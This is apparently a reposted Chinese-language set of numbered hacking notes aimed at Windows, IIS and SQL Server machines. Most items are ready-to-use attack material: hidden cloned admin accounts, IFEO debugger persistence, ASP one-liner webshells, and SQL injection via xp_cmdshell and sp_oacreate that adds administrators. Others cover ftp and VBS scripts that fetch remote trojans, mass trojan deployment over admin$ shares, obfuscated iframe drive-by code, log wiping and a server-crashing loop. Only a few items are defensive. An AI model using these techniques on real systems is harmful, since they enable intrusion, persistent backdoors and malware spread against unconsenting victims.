別人的入侵筆記

一、Xp系統修改權限防止病毒或木馬等破壞系統,cmd下,
cacls C:\windows\system32 /G hqw20:R
思是給hqw20這個用戶只能讀取SYSTEM32目錄,但不能進行修改或寫入
恢復方法:C:\>cacls C:\windows\system32 /G hqw20:Fjavascript

二、用Microsoft自帶的IExpress工具做的捆綁木馬能夠躲過不少殺毒軟件,運行對話框中輸入Iexpress。html

三、內網使用灰鴿子,肉雞上vidcs.exe -p端口,本地VIDCS裏,VIDCS服務IP 填肉雞的IP,VIDCS服務端口,就是給肉雞開的端口,BINDIP添本身的內網IP,BIND端口 添8000,映射端口添8000。java

四、創建隱藏賬號,上次總結了用guest創建隱藏的管理員,此次再介紹一種,在cmd下創建一個ating$的用戶,而後註冊表下複製管理員的1F4裏的F 值到ating$的F值,再把ating$改成$,這樣在計算機管理的用戶裏看不到這個隱藏賬號web

五、利用INF文件來修改註冊表
[Version]
Signature=」$CHICAGO$」
[Defaultinstall]
addREG=Ating
[Ating]
HKCU,」Software\Microsoft\Windows\CurrentVersion\Policies\system」,」disableregistrytools」,」0×00010001″,」1″
以上代碼保存爲inf格式,注意沒有換行符,在命令行裏導入inf的命令以下:
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具體路徑
其中HKEY_CLASSES_ROOT 簡寫爲 HKCR,HKEY_CURRENT_USER 簡寫爲 HKCU
HKEY_LOCAL_MACHINE 簡寫爲 HKLM,HKEY_USERS 簡寫爲 HKU
HKEY_CURRENT_CONFIG 簡寫爲 HKCC
0×00000000 表明的是 字符串值,0×00010001 表明的是 DWORD值
「1″這裏表明是寫入或刪除註冊表鍵值中的具體數據sql

六、關於製做穿xp2防火牆的radmin,你們必定要會,各大黑客網站都有動畫,
多了一步就是在防火牆裏添加個端口,而後導出其鍵值
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]shell

七、系統啓動時Alerter服務啓動前啓動木馬程序ating.exe,此方法很隱蔽
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下創建service.exe項,再在service.exe項創建一個Debugger的鍵(字符串值),鍵值填ating.exe的 全路徑。數據庫

八、將ftp.exe傳到服務器用來提權,能夠先把它變成ating.gif格式的再用,迷惑管理員。express

九、有時候在咱們進入了網站後臺,可是沒有上傳圖片和備份等功能,得不到webshell,
但是不能白來一場,能夠看看發表公告或新聞支不支持html和script,支持的話加個frame馬或者其餘的什麼。windows

十、用google幫咱們找網站後臺,搜索」filetype:asp site:www.hack6.com inurl:login」api

十一、咱們中了盜密碼的木馬後不要急於刪除,通常這些木馬都是把密碼發到指定郵箱,咱們能夠用探嗅軟件來找到郵箱的用戶名和密碼,好比安全焦點的xsniff,
用法:xsniff –pass –hide –log pass.txt

十二、google搜索的藝術
搜索關鍵字:「未閉合的引號」或「ADODB.Field.error」或「Either BOF or EOF in True」
或「字符串的語法錯誤」能夠找到不少sql注入漏洞。

1三、還能夠搜一些木馬的關鍵字,好比搜索「管理登錄 海洋頂端 inurl:asp」,搜到了說明此網站服務器的其中網站確定有漏洞。

1四、cmd中輸入 nc –vv –l –p 1987
作個bat文件內容爲sqlhello 起始ip 1433 終止ip 1987 掃雞吃

1五、製做T++木馬,先寫個ating.hta文件,內容爲
<script. language=」VBScript」>
set wshshell=createobject (「wscript.shell」 )
a=wshshell.run(「你馬的名稱」,1)
window.close
</script>
再用mshta生成T++木馬,命令爲mshta ating.hta ating.t++,用網頁木馬生成器生成網頁木馬。

1六、搜索欄裏輸入
關鍵字%’and 1=1 and ‘%’=’
關鍵字%’and 1=2 and ‘%’=’
比較不一樣處 能夠做爲注入的特徵字符

1七、掛馬代碼<html>
<iframe. src=」馬的地址」 width=」0″ height=」0″ frameborder=」0″></iframe>
</html>

1八、開啓regedt32的SAM的管理員權限 檢查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理員和guest的F鍵 值,若是同樣就是用被入侵過了,而後刪了guest賬號,對方能夠用guest賬號使用administraeors的權限,你也能夠用這方法留住肉雞, 這方法是簡單克隆,
net localgroup administrators仍是能夠看出Guest是管理員來。

1九、軟件instsrv.exe 把.exe文件作成系統服務來啓動 用來肉雞掛QQ等
用法: 安裝: instsrv.exe 服務名稱 路徑
卸載: instsrv.exe 服務名稱 REMOVE
[url=/soft/instsrv.rar]點擊本站下載[/url]

2一、SQL注入時工具—Internet選項—高級裏找到顯示友好的錯誤信息勾去掉
不能注入時要第一時間想到%5c暴庫。

2二、不少網站程序(好比華碩中文官方網站)上傳圖片時有可能在檢測文件的時候是 從左朝又進行檢測,也就是說,他會檢測文件是否是有.jpg,那麼咱們要是把文件改爲:ating.jpg.asp試試。。因爲仍是ASP結尾,因此木馬不會變~

2三、缺乏xp_cmdshell時
嘗試恢復EXEC sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’
假如恢復不成功,能夠嘗試直接加用戶(針對開3389的)
declare @o int
exec sp_oacreate ‘wscript.shell’,@o out
exec sp_oamethod @o,’run’,NULL,’cmd.exe /c net user ating ating /add’ 再提到管理員

24.批量種植木馬.bat
for /f %%i in (掃描地址.txt) do copy pc.exe %%i\admin$ 複製木馬到掃描的計算機當中
for /f %%i in (掃描地址.txt) do at %%i 09:50 pc.exe 在對方計算機上運行木馬的時間
掃描地址.txt裏每一個主機名一行 用\\開頭

2五、在程序上傳shell過程當中,程序不容許包含<% %>標記符號的內容的文件上傳,好比藍屏最小 的asp木馬<%execute request(「l」)%>,咱們來把他的標籤換一下: <script. language=VBScript. runat=server>execute request(「l」)</Script> 保存爲.asp,程序照樣執行。

2六、IIS6 For Windows 2003 Enterprise Edition 如IIS發佈目錄文件夾包含.asp後輟名.
將.asp後輟改成.jpg或其它的如.htm,也能夠運行asp,但要在.asp文件夾下.
.cer 等後綴的文件夾下均可以運行任何後綴的asp木馬

2七、telnet一臺交換機 而後在telnet控制主機 控制主機留下的是交換機的IP
而後用#clear logg和#clear line vty *刪除日誌

2八、電腦壞了省去從新安裝系統的方法
純dos下執行,
xp:copy C:\WINDOWS\repair\*.* 到c:\windows\system32\config
2k: copy C:\winnt\repair\*.* 到c:\winnt\system32\config

2九、解決TCP/IP篩選 在註冊表裏有三處,分別是:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
分別用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令來導出註冊表項
而後把三個文件裏的EnableSecurityFilters」=dword:00000001,
改爲EnableSecurityFilters」=dword:00000000 再將以上三個文件分別用
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 導入註冊表便可。

30、使CHM木馬沒法在本地運行木馬程序 將註冊表」HKEY_CURRENT_U
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0″下的1004項的值由原來十進制的0改成十六進制的3

3一、全手工打造開3389工具
打開記事本,編輯內容以下:
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
編輯好後存爲BAT文件,上傳至肉雞,執行

3二、掛馬js代碼document.write(‘<iframe. height=0 width=0 src=」木馬地址.htm」></iframe>’);保存到js頁面裏 可以讓全部頁面掛馬

3三、讓服務器重啓
寫個bat死循環:
@echo off
:loop1
cls
start cmd.exe
goto loop1
保存成bat guset權限就能夠運行 運行後很快服務器就會死機 管理員天然會去重啓

3四、若是你登陸肉雞的3389時發現有cmd一閃而過,那你可要當心了,管理員寫了個bat在監視你,
@echo off
date /t >c:/3389.txt
time /t >>c:/3389.txt
attrib +s +h c:/3389.bat
attrib +s +h c:/3389.txt
netstat -an |find 「ESTABLISHED」 |find 「:3389″ >>c:/3389.txt
並保存爲3389.bat
打開註冊表找到:Userinit這個鍵值 在末尾加入3389.bat所在的位置,好比我放到C盤,就寫:,c:/3389.bat,注意必定要加個逗號

3五、有時候提不了權限的話,試試這個命令,在命令行裏輸入:
start http://www.hack520.org/muma.htm而後點執行。(muma.htm是你上傳好的漏洞網頁)
輸入:netstat -an | find 「28876″ 看看是否成功綁定,若是有就telnet上去,就有了system權限,固然也能夠nc鏈接,本地執行命令。

3六、在cmd下用ftp上傳馬方法,咱們能夠用echo 寫一個批處理文件
echo open 你的FTP空間地址 >c:\1.bat //輸入你的FTP地址
echo 你的FTP帳號 >>c:\1.bat //輸入帳號
echo 你的FTP密碼 >>c:\1.bat //輸入密碼
echo bin >>c:\1.bat //登入
echo get 你的木馬名 c:\ ating.exe >>c:\1.bat //下載某文件到某地方並更名爲何
echo bye >>c:\1.bat //退出
而後執行ftp -s:c:\1.bat便可

3七、修改註冊表開3389兩法
(1)win2000下開終端 首先用ECHO寫一個3389.reg文件,而後導入到註冊表
echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo 「Enabled」=」0″ >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon] >>3389.reg
echo 「ShutdownWithoutLogon」=」0″ >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
>>3389.reg
echo 「EnableAdminTSRemote」=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
>>3389.reg
echo 「TSEnabled」=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo 「Start」=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
>>3389.reg
echo 「Start」=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo 「Hotkey」=」1″ >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo 「PortNumber」=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp] >>3389.reg
echo 「PortNumber」=dword:00000D3D >>3389.reg
把這些ECHO代碼到CMDSHELL下貼粘就能夠生成3389.reg文件,接着regedit /s 3389.reg導入註冊表。
(若是要改變終端端口只須把上面的兩個D3D都改一下就能夠了)
由於win 2k下開終端不能像XP同樣能夠當即生效,而是需重啓機器後才生效
(2)winxp和win2003終端開啓
用如下ECHO代碼寫一個REG文件:
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server]>>3389.reg
echo 「fDenyTSConnections」=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo 「PortNumber」=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp]>>3389.reg
echo 「PortNumber」=dword:00000d3d>>3389.reg
而後regedit /s 3389.reg del 3389.reg
XP下不論開終端仍是改終端端口都不需重啓

3八、找到SA密碼爲空的肉雞必定要第一時間改SA密碼,防止別人和咱們搶肉吃
用查詢分析器運行 EXEC sp_password NULL, ‘你要改的密碼’, ‘sa’

3九、增強數據庫安全 先要聲明把mdb改爲asp是不能防止下載的!
(1)數據庫文件名應複雜並要有特殊字符
(2)不要把數據庫名稱寫在conn.asp裏,要用ODBC數據源
將conn.asp文檔中的
DBPath = Server.MapPath(「數據庫.mdb」)
conn.Open 「driver={Microsoft Access Driver (*.mdb)};dbq=」 & DBPath

修改成:conn.open 「ODBC數據源名稱,」 而後指定數據庫文件的位置
(3)不放在WEB目錄裏

40、登錄終端後有兩個東東很危險,query.exe和tsadmin.exe要Kill掉
能夠寫兩個bat文件
@echo off
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
@del c:\winnt\system32\query.exe
@del %SYSTEMROOT%\system32\dllcache\query.exe
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //複製一個假的

@echo off
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
@del c:\winnt\system32\tsadmin.exe
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex

4一、映射對方盤符
telnet到他的機器上,
net share 查看有沒有默認共享 若是沒有,那麼就接着運行
net share c$=c:
net share如今有c$
在本身的機器上運行
net use k: \\*.*.*.*\c$ 把目標共享映射到本地硬盤,盤符爲K

4二、一些頗有用的老知識
type c:\boot.ini ( 查看系統版本 )
net start (查看已經啓動的服務)
query user ( 查看當前終端鏈接 )
net user ( 查看當前用戶 )
net user 用戶 密碼/add ( 創建帳號 )
net localgroup administrators 用戶 /add (提高某用戶爲管理員)
ipconfig -all ( 查看IP什麼的 )
netstat -an ( 查看當前網絡狀態 )
findpass 計算機名 管理員名 winlogon的pid (拿到管理員密碼)
克隆時Administrator對應1F4
guest對應1F5
tsinternetuser對應3E8

4三、若是對方沒開3389,可是裝了Remote Administrator Service
用這個命令F:\ftp.exe 「regedit -s F:\longyi.biz\RAdmin.reg」 鏈接
解釋:用serv-u漏洞導入本身配製好的radmin的註冊表信息
先備份對方的F:\ftp.exe 「regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin」

4四、用lcx作內網端口映射,先在肉雞上監聽 lcx -listen 52 8089 (端口自定)
本地上運行映射,lcx -slave 雞的ip 52 我內網的ip 80 (個人WEB是80端口)

4五、在服務器寫入vbs腳本下載指定文件(好比用nbsi利用注入漏洞寫入)
echo Set x= CreateObject(^」Microsoft.XMLHTTP^」):x.Open
^」GET^」,LCase(WScript.Arguments(0)),0:x.Send():Set s =
CreateObject(^」ADODB.Stream^」):s.Mode = 3:s.Type =
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
(這是完整的一句話,其中沒有換行符)
而後下載:
cscript. down.vbs http://www.hack520.org/hack.exe hack.exe

4六、一句話木馬成功依賴於兩個條件:
1、服務端沒有禁止adodb.Stream或FSO組件
2、權限問題:若是當前的虛擬目錄禁止user級或everyone寫入的話也是不會成功的。

4七、利用DB_OWNER權限進行手工備份一句話木馬的代碼:
;alter database utsz set RECOVERY FULL–
;create table cmd (a image)–
;backup log utsz to disk = ‘D:\cmd’ with init–
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)–
;backup log utsz to disk = ‘D:\utsz_web\utsz\hacker.asp’–
注:0x3C25657865637574652872657175657374282261222929253EDA爲一句話木馬的16進制形式。

4八、tlntadmn是telnet服務的設置命令,能夠對telnet服務的端口、認證方式等進行設置:

用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
全部會話用 ‘all’。
-s sessionid列出會話的信息。
-k sessionid終止會話。
-m sessionid發送消息到會話。

config配置 telnet 服務器參數。

common_options 爲:
-u user 指定要使用其憑據的用戶
-p password 用戶密碼

config_options 爲:
 dom = domain 設定用戶的默認域
 ctrlakeymap = yes|no 設定 ALT 鍵的映射
 timeout = hh:mm:ss 設定空閒會話超時值
 timeoutactive = yes|no 啓用空閒會話。
 maxfail = attempts 設定斷開前失敗的登陸企圖數。
 maxconn = connections設定最大鏈接數。
 port = number設定 telnet 端口。
 sec = [+/-]NTLM [+/-]passwd
設定身份驗證機構
 fname = file 指定審計文件名。
 fsize = size 指定審計文件的最大尺寸(MB)。
 mode = console|stream指定操做模式。
 auditlocation = eventlog|file|both
指定記錄地點
 audit = [+/-]user [+/-]fail [+/-]admin

4九、例如:在IE上訪問:
www.hack520.org/hack.txt就會跳轉到http://www.hack520.org/
hack.txt裏面的代碼是:
<body> <META. HTTP-EQUIV=」Refresh」 CONTENT=」5;URL=http://www.hack520.org/」>
把這個hack.txt發到你空間就能夠了!
這個能夠利用來作網馬哦!

50、autorun的病毒能夠經過手動限制!
1,養成好習慣,插入U盤或移動硬盤,都要按住shift讓其禁止自動運行!
2,打開盤符用右鍵打開!切忌雙擊盤符~
3,能夠利用rar軟件查看根目錄下autorun病毒並刪除之!他能夠處理一些連右鍵都沒法打開的分區!

5一、log備份時的一句話木馬:
a).<%%25Execute(request(「go」))%%25>
b).<%Execute(request(「go」))%>
c).%><%execute request(「go」)%><%
d).<script. language=VBScript. runat=server>execute request(「sb」)</Script>
e).<%25Execute(request(「l」))%25>
f).<%if request(「cmd」)<>」" then execute request(「pass」)%>

5二、at 「12:17″ /interactive cmd
執行後能夠用AT命令查看新加的任務
用AT這個命令以交互的方式運行cmd.exe 這樣運行的cmd.exe是system權限。

5三、隱藏ASP後門的兩種方法
一、創建非標準目錄:mkdir images..\
拷貝ASP木馬至目錄:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
經過web訪問ASP木馬:http://ip/images../news.asp?action=login
如何刪除非標準目錄:rmdir images..\ /s
二、Windows中的IIS會對以.asp結尾的目錄中的文件進行解析,以達到咱們隱藏本身的網頁後門的目的:
mkdir programme.asp
新建1.txt文件內容:<!–#include file=」12.jpg」–>
新建12.jpg文件內容:<%execute(request(「l」))%> 或使用GIF與ASP合併後的文件
attrib +H +S programme.asp
經過web訪問ASP一句話木馬:http://ip/images/programme.asp/1.txt

5四、attrib /d /s c:\windows +h +s,後windows目錄變爲隱藏+系統,隱藏屬性爲灰不可更改,windows目錄下面的文件和目錄並無繼承屬性,原來是什麼樣仍是什麼樣。
而後在利用attrib /d /s c:\windows -h -s,windows目錄能夠顯示,隱藏屬性能夠再次選中。

5五、JS隱蔽掛馬
1.
var tr4c3=」<iframe. src=ht」;
tr4c3 = tr4c3+」tp:/」;
tr4c3 = tr4c3+」/ww」;
tr4c3 = tr4c3+」w.tr4″;
tr4c3 = tr4c3+」c3.com/inc/m」;
tr4c3 = tr4c3+」m.htm style=」display:none」></i」;
tr4c3 =tr4c3+」frame>’」;
document.write(tr4c3);
避免被管理員搜索網馬地址找出來。把變量名定義的和網站自己的接近些,混淆度增長。

2.
轉換進制,而後用EVAL執行。如
eval(「\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73″);
不過這個有點顯眼。
3.
document.write (‘<iframe. src=http://www.tr4c3.com/inc/mm.htm style=」display:none」></iframe>’);
最後一點,別忘了把文件的時間也修改下。

56.3389終端入侵經常使用DOS命令
taskkill  taskkill /PID 1248 /t

tasklist  查進程

cacls 「C:\Program Files\ewido anti-spyware 4.0\guard.exe」 /d:everyone  改、下降某文件權限
iisreset /reboot
tsshutdn /reboot /delay:1    重起服務器

logoff 12  要使用會話 ID(例如,會話 12)從會話中註銷用戶,

query user  查看當前終端用戶在線狀況

要顯示有關全部會話使用的進程的信息,請鍵入:query process *

要顯示有關會話 ID 2 使用的進程的信息,請鍵入:query process /ID:2

要顯示有關服務器 SERVER2 上全部活動會話的信息,請鍵入:query session /server:SERVER2

要顯示有關當前會話 MODEM02 的信息,請鍵入:query session MODEM02

命令列:rundll32.exe user.exe,restartwindows 功能: 系統重啓

命令列:rundll32.exe user.exe,exitwindows 功能: 關閉系統

命令列: rundll32.exe user.exe,restartwindows 功能: 強行關閉全部程式並重啓機器。

命令列: rundll32.exe user.exe,exitwindows 功能: 強行關閉全部程式並關機

5六、在地址欄或按Ctrl+O,輸入:
javascript.:s=document.documentElement.outerHTML;document.write(‘<body></body>’);document.body.innerText=s;

源代碼就出來了。不論加密如何複雜,最終都要還原成瀏覽器能夠解析的html代碼,而documentElement.outerHTML正是最終的結果。

5七、net user的時候,是不能顯示加$的用戶,可是若是不處理的話,
用net localgroup administrators是能夠看到管理組下,加了$的用戶的。

5八、 sa弱口令相關命令

一.更改sa口令方法:
用sql綜合利用工具鏈接後,執行命令:
exec sp_password NULL,’20001001′,’sa’
(提示:慎用!)

二.簡單修補sa弱口令.

方法1:查詢分離器鏈接後執行:
if exists (select * from
dbo.sysobjects where id = object_id(N’[dbo].[xp_cmdshell]‘) and
OBJECTPROPERTY(id, N’IsExtendedProc’) = 1)

exec sp_dropextendedproc N’[dbo].[xp_cmdshell]‘

GO

而後按F5鍵命令執行完畢

方法2:查詢分離器鏈接後
第一步執行:use master
第二步執行:sp_dropextendedproc ‘xp_cmdshell’
而後按F5鍵命令執行完畢

三.常見狀況恢復執行xp_cmdshell.

1  未能找到存儲過程’master..xpcmdshell’.
恢復方法:查詢分離器鏈接後,
第一步執行:EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o int
第二步執行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
而後按F5鍵命令執行完畢

2  沒法裝載 DLL xpsql70.dll 或該DLL所引用的某一 DLL。緣由126(找不到指定模塊。)
恢復方法:查詢分離器鏈接後,
第一步執行:sp_dropextendedproc 「xp_cmdshell」
第二步執行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
而後按F5鍵命令執行完畢

3  沒法在庫 xpweb70.dll 中找到函數 xp_cmdshell。緣由: 127(找不到指定的程序。)
恢復方法:查詢分離器鏈接後,
第一步執行:exec sp_dropextendedproc ‘xp_cmdshell’
第二步執行:exec sp_addextendedproc ‘xp_cmdshell’,'xpweb70.dll’
而後按F5鍵命令執行完畢

四.終極方法.
若是以上方法均不可恢復,請嘗試用下面的辦法直接添加賬戶:
查詢分離器鏈接後,
2000servser系統:
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net user 用戶名 密碼 /add’

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net localgroup administrators  用戶名 /add’

xp或2003server系統:

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net user 用戶名 密碼 /add’

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net localgroup administrators 用戶名 /add’

5九、開23端口telnet的話,太危險了。你們均可以掃描到。就不是我的的後門了。。這裏很簡單隻須要一句命令:tlntadmn config port=1001這句命令的意思是把telnet23端口改成1001你們能夠本身更改在1025之內的端口。。能夠欺騙性的改25。。呵呵

相關文章
相關標籤/搜索